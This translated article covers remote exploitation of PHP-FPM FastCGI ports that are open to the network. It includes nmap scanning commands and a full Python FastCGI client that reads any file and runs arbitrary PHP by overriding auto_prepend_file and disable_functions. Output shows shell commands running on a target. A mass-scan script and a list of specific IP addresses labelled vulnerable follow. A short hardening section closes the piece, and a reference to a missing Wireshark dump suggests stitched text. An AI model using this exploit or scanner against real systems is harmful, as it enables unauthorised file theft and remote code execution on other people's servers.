Walkthrough of a Python scan script for the FastCGI file-read vulnerability

Source: Internet
Author: User
This article walks through a Python scan script for the PHP FastCGI file-read vulnerability; readers who need it can refer to the following.

Remote exploitation of PHP FastCGI

FastCGI is one of the most common models for executing dynamic scripts behind a web server. Almost every web scripting language supports it, and for some (RoR, Python, etc.) it is essentially the only model.

The main purpose of FastCGI is to split the web server and the dynamic-language interpreter into two separate resident processes. When the web server receives a request for a dynamic script, it forwards the request over the network, using the FCGI protocol, to the FCGI process; the FCGI process runs the script and hands the result back to the web server, which outputs it to the browser. Because the interpreter does not have to be restarted for every request (as with classic CGI) and is not embedded in the web server (as with a module), this model scales very well: once the volume of dynamic requests grows, the back-end FCGI processes can be moved onto a cluster of their own, which also greatly improves maintainability. This is one of the reasons FCGI and similar models are so popular.

However, this model also brings a number of problems. For example, the "Nginx file parsing vulnerability" published by 80sec last year was really a mismatch between how FCGI and the web server interpret the script path parameters. In addition, since FCGI and the web server talk over the network, more and more clusters put the FCGI process directly on the public internet, where anyone can reach it. That means anyone can impersonate the web server and make the FCGI process execute whatever script content they choose.

That is the background. Below I use PHP, the language I know best, as the example.

PHP's FastCGI implementation is usually called FPM (php-fpm). By default it listens on port 9000, so we scan for it directly with Nmap:

nmap -sV -p 9000 --open x.x.x.x/24

Why -sV? Other services may also be running on port 9000, so we use Nmap's service fingerprinting to identify what is actually listening.

[root@test:~/work/fcgi]# nmap -sV -p 9000 --open 173.xxx.xxx.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT
Nmap scan report for abc.net (173.xxx.xxx.111)
Host is up (0.0095s latency).
PORT     STATE SERVICE VERSION
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Nmap scan report for abc.com (173.xxx.xxx.183)
Host is up (0.0096s latency).
PORT     STATE SERVICE    VERSION
9000/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

A random scan, with some luck: this /24 has two hosts with port 9000 open. One is an sshd that the administrator moved to port 9000; the other shows "tcpwrapped" (Nmap could not fingerprint it), and that is our target.

For the test I wrote a FastCGI client program that sends requests directly to the remote FPM. What can we do with an open FastCGI port? This is a bit different from a normal HTTP request: to supply the script with its parameters, the web server passes a set of fastcgi_params to the FCGI process with every forwarded request. Normally those parameters are not under the user's control, but when the FCGI port is exposed we get to set them ourselves, which lets us do things that are otherwise impossible:

[root@test:~/work/fcgi]# ./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-type: text/html

Ubuntu 10.04.3 LTS \n \l

Reading /etc/issue shows that this is an Ubuntu 10.04 machine. How does that work? In the fastcgi_params we set DOCUMENT_ROOT to the root directory "/" and SCRIPT_FILENAME to /etc/issue. As long as the FPM worker has permission, we can make it read any file on the machine. Strictly speaking the file is not "read" but executed: PHP includes it as a script, and a file that contains no PHP tags is simply echoed back.

Because the file is executed, this vulnerability behaves like a common LFI: if you know the path of a log file on the machine, or of any file whose content you can influence, you can execute arbitrary code.

Is that all? No. If poisoning a log or guessing other file paths is inconvenient, is there an easier way to execute code that I submit myself?

I looked at several approaches. The first idea was to pass environment variables as parameters and then execute /proc/self/environ; unfortunately php-fpm only alters the environment in memory after receiving my parameters and does not change that file, so it cannot be exploited this way, and the trick does not work on every system anyway.

In my earlier write-up of the PoC and technical details of CVE-2012-1823 (the php-cgi RCE), arbitrary remote files were executed by dynamically changing the value of auto_prepend_file in php.ini. Turning an LFI into an RFI greatly widens the room for exploitation.

Does FastCGI support a similar dynamic change of PHP configuration? I checked: FPM originally did not, until a developer filed a bug and the PHP team merged the feature into the source of PHP 5.3.3.

So through fastcgi_params we can use PHP_ADMIN_VALUE and PHP_VALUE to change PHP settings dynamically:

env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "auto_prepend_file = php://input"
env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"

With auto_prepend_file = php://input, PHP executes the POST body before the requested script, so we put our PHP code in the POST body and it runs directly.
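The exchange described above, as an added example that is not part of the original article and not the code of fcgi_exp: a minimal FastCGI client in Python 3 that builds the BEGIN_REQUEST, PARAMS and STDIN records a web server would send, injects the PHP_VALUE/PHP_ADMIN_VALUE overrides when a PHP payload is supplied, and splits the FCGI_STDOUT stream back out of the reply. The record layout and parameter names follow the FastCGI 1.0 specification; the SERVER_*/REMOTE_* filler values are assumptions that FPM does not validate.

```python
import socket
import struct
import sys

# Record types and the responder role, from the FastCGI 1.0 specification.
FCGI_BEGIN_REQUEST, FCGI_END_REQUEST, FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT, FCGI_STDERR = 1, 3, 4, 5, 6, 7
FCGI_RESPONDER = 1


def fcgi_record(rtype, content, request_id=1):
    """Wrap content in a record: version 1, type, request id, content length, padding length, reserved byte."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", 1, rtype, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def nv_length(n):
    """A name or value length is one byte below 128, otherwise four bytes with the top bit set."""
    return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)


def encode_params(params):
    """Serialise a dict as FastCGI name-value pairs (the fastcgi_params a web server would send)."""
    out = b""
    for name, value in params.items():
        name_b, value_b = name.encode(), value.encode()
        out += nv_length(len(name_b)) + nv_length(len(value_b)) + name_b + value_b
    return out


def build_request(script_path, php_code=None, document_root="/"):
    """Build the record sequence for one request.

    With php_code=None this is the "read" case: DOCUMENT_ROOT=/ plus SCRIPT_FILENAME pointing at
    any file makes FPM include that file.  With php_code set, the PHP_VALUE / PHP_ADMIN_VALUE
    overrides (FPM >= 5.3.3) make PHP prepend php://input, i.e. the POST body we send on STDIN.
    """
    body = php_code.encode() if php_code else b""
    params = {
        "GATEWAY_INTERFACE": "FastCGI/1.0",
        "REQUEST_METHOD": "POST" if body else "GET",
        "SCRIPT_FILENAME": script_path,
        "SCRIPT_NAME": script_path,
        "DOCUMENT_ROOT": document_root,
        "SERVER_PROTOCOL": "HTTP/1.1",
        "SERVER_SOFTWARE": "php/fcgiclient",  # assumed filler values from here on; FPM does not check them
        "SERVER_NAME": "localhost",
        "SERVER_ADDR": "127.0.0.1",
        "SERVER_PORT": "80",
        "REMOTE_ADDR": "127.0.0.1",
        "REMOTE_PORT": "9985",
        "CONTENT_LENGTH": str(len(body)),
    }
    if body:
        params["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
        params["PHP_VALUE"] = "auto_prepend_file = php://input"
        params["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"
    begin_body = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags (no keep-conn), reserved
    request = fcgi_record(FCGI_BEGIN_REQUEST, begin_body)
    request += fcgi_record(FCGI_PARAMS, encode_params(params))
    request += fcgi_record(FCGI_PARAMS, b"")  # an empty record closes the PARAMS stream
    if body:
        request += fcgi_record(FCGI_STDIN, body)
    request += fcgi_record(FCGI_STDIN, b"")  # an empty record closes STDIN
    return request


def parse_response(data):
    """Walk the reply records and return (stdout, stderr) as bytes; stops at END_REQUEST."""
    stdout, stderr, pos = b"", b"", 0
    while pos + 8 <= len(data):
        _version, rtype, _rid, clen, plen = struct.unpack(">BBHHBx", data[pos:pos + 8])
        content = data[pos + 8:pos + 8 + clen]
        pos += 8 + clen + plen
        if rtype == FCGI_STDOUT:
            stdout += content
        elif rtype == FCGI_STDERR:
            stderr += content
        elif rtype == FCGI_END_REQUEST:
            break
    return stdout, stderr


def cgi_body(stdout):
    """Strip the CGI headers (X-Powered-By, Content-type) PHP puts in front of the script output."""
    head, sep, body = stdout.partition(b"\r\n\r\n")
    return body if sep else head


def fcgi_exchange(host, port, request, timeout=5.0):
    """Send one request to an FPM port and collect the reply until the peer closes or goes quiet."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    # usage: fcgi_client.py HOST PORT /path/on/target [php code]
    #   read:    fcgi_client.py 10.0.0.5 9000 /etc/issue
    #   execute: fcgi_client.py 10.0.0.5 9000 /tmp/a.php '<?php system("id; uname -a"); ?>'
    host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    code = sys.argv[4] if len(sys.argv) > 4 else None
    out, err = fcgi_exchange(host, port, build_request(path, code))
    sys.stdout.write(cgi_body(out).decode(errors="replace"))
    if err:
        sys.stderr.write(err.decode(errors="replace"))
```

The first 16 bytes produced by build_request are exactly the BEGIN_REQUEST record seen at the start of the Wireshark dump further down (01 01 00 01 00 08 00 00 / 00 01 00 00 00 00 00 00): version 1, type 1, request id 1, 8 bytes of content, then role 1 (responder) and flags 0. Because the keep-conn flag is clear, FPM closes the connection after END_REQUEST, which is what ends the receive loop.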

[root@test:~/work/fcgi]# ./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"
X-Powered-By: PHP/5.5.0-dev
Content-type: text/html

uid=500(www) gid=500(www) groups=500(www)
Linux test 2.6.18-308.13.1.el5 #1 SMP Tue 17:51:21 EDT x86_64 x86_64 x86_64 GNU/Linux

Attentive readers will notice two changes here. I switched to a different machine for this test: the host found at first runs PHP 5.3.2, just below 5.3.3, so the INI-override trick cannot be used there to execute code, only path guessing.

The other change is that I read /tmp/a.php, an existing PHP file, rather than /etc/issue. Starting with 5.3.9, PHP added the php-fpm setting security.limit_extensions, which by default only allows files with the extension ".php" to be executed, so you have to find a PHP file that already exists. That setting lives in php-fpm.conf and cannot be overridden through the INI values above. If anyone has a better way around this limit, please let me know.

That completes the tests against PHP-FPM: from an exposed FCGI port we obtained a shell directly. Other FastCGI implementations are worth a look as well; there may be more to find.

How to prevent this? Very simple: do not expose the FCGI interface to the public internet. I also hope that FCGI gains an authentication mechanism in the future.
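A php-fpm pool configuration illustrating that advice, added here as an example rather than taken from the original article. The directive names are php-fpm's own; the addresses and socket path are assumptions for a typical single-host deployment where the web server and FPM share a machine.

```ini
; www.conf, exposed variant: a bare port binds every interface, so any host that can
; reach 9000 can act as the "web server" and set fastcgi_params itself
listen = 9000

; www.conf, hardened variant
; bind to loopback only (or use a unix socket and skip TCP entirely)
listen = 127.0.0.1:9000
; listen = /run/php-fpm/www.sock
; for TCP listeners, additionally allow-list the web server's address(es)
listen.allowed_clients = 127.0.0.1
; php-fpm >= 5.3.9: only execute files ending in .php; this lives in the pool config
; and cannot be changed through PHP_VALUE / PHP_ADMIN_VALUE
security.limit_extensions = .php
```

On the web-server side, fastcgi_pass (nginx) or the equivalent must point at the same loopback address or socket; listen.allowed_clients is a complement to the firewall, not a replacement, and it only applies to TCP sockets.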

To compile fcgi_exp on any system, install Go (Golang) and run:

go build fcgi_exp.go

Python scan script for the FastCGI file-read vulnerability

The FastCGI file read (and code execution) is an old vulnerability; the description is the article above, Remote exploitation of PHP FastCGI.

It can be exploited to read system files and sometimes even to execute code. The tool mentioned in that article is available for download: fcgi_exp

I don't much care about the protocol details; I just need a Python scan script, so I captured Gary's program with Wireshark and wrote a small piece of code.

Very few machines expose port 9000 to the internet, but on an intranet it is quite possible.

import socket
import struct
import sys


def fcgi_record(rtype, content, request_id=1):
    # FastCGI record: version 1, type, request id, content length, padding length, reserved byte
    pad = (8 - len(content) % 8) % 8
    return struct.pack(">BBHHBx", 1, rtype, request_id, len(content), pad) + content + b"\x00" * pad


def build_probe(path="/etc/passwd"):
    # The original script replayed the raw bytes captured from fcgi_exp with Wireshark; that hex
    # dump did not survive intact, so the same request is rebuilt here: BEGIN_REQUEST (role
    # responder), one PARAMS record with DOCUMENT_ROOT=/ and SCRIPT_FILENAME=path plus the usual
    # CGI fields a web server sends, then an empty PARAMS record and an empty STDIN record.
    params = [
        ("GATEWAY_INTERFACE", "FastCGI/1.0"), ("REQUEST_METHOD", "GET"),
        ("SCRIPT_FILENAME", path), ("SCRIPT_NAME", path), ("DOCUMENT_ROOT", "/"),
        ("SERVER_SOFTWARE", "php/fcgiclient"), ("SERVER_PROTOCOL", "HTTP/1.1"),
        ("SERVER_NAME", "localhost"), ("SERVER_ADDR", "127.0.0.1"), ("SERVER_PORT", "80"),
        ("REMOTE_ADDR", "127.0.0.1"), ("REMOTE_PORT", "9985"), ("CONTENT_LENGTH", "0"),
    ]
    # every name and value here is shorter than 128 bytes, so each length fits in one byte
    body = b"".join(bytes([len(k), len(v)]) + k.encode() + v.encode() for k, v in params)
    return (fcgi_record(1, struct.pack(">HB5x", 1, 0)) + fcgi_record(4, body)
            + fcgi_record(4, b"") + fcgi_record(5, b""))


def test_fastcgi(ip, port=9000):
    # Vulnerable if FPM "executes" /etc/passwd and echoes it back: look for ':root:' in the reply
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5.0)
    try:
        sock.connect((ip, port))
        sock.sendall(build_probe())
        ret = sock.recv(1024)
        if b":root:" in ret:
            print(ret.decode(errors="replace"))
            print("%s is vulnerable!" % ip)
            return True
        return False
    except (socket.error, OSError):
        return False
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print(sys.argv[0], "[IP]")
    else:
        test_fastcgi(sys.argv[1])

A quick scan of port 9000 turns up several vulnerable machines:

110.164.68.137 is Vul!
110.164.68.148 is Vul!
110.164.68.149 is Vul!
110.164.68.151 is Vul!
110.164.68.154 is Vul!
110.164.68.155 is Vul!

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd
